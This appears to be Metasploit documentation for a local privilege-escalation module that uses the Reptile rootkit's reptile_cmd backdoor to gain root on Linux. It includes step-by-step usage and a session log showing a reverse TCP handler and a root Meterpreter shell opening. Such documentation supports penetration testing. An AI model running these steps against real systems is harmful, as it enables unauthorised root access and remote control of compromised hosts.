## Description

  This module uses Reptile rootkit's `reptile_cmd` backdoor executable
  to gain root privileges using the `root` command.


## Vulnerable Application

  [Reptile](https://github.com/f0rb1dd3n/Reptile) is a Linux Kernel Module (LKM) rootkit.

  The `reptile_cmd` utility, installed to `/reptile` by default, permits elevating privileges
  to root using the `root` argument.

  This module has been tested successfully with Reptile from `master` branch (2019-03-04) on:

  * Ubuntu 18.04.3 (x64)
  * Linux Mint 19 (X64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **REPTILE_CMD_PATH**

  Path to `reptile_cmd` executable (default: `/reptile/reptile_cmd`)

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

### Ubuntu 18.04.3 (x64)

  ```
  msf5 > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check

  [+] /reptile/reptile_cmd is executable
  [*] Output: uid=0(root) gid=0(root) groups=0(root)
  [+] Reptile is installed and loaded
  [+] The target is vulnerable.
  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] /reptile/reptile_cmd is executable
  [*] Output: uid=0(root) gid=0(root) groups=0(root)
  [+] Reptile is installed and loaded
  [*] Writing '/tmp/.Q53XrrJ3RFy' (207 bytes) ...
  [*] Executing payload...

  [*] Transmitting intermediate stager...(106 bytes)
  [*] Sending stage (985320 bytes) to 172.16.191.166
  [*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.166:56736) at 2019-12-08 03:19:01 -0500

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.166
  OS           : Ubuntu 18.04 (Linux 5.0.0-25-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 
  ```

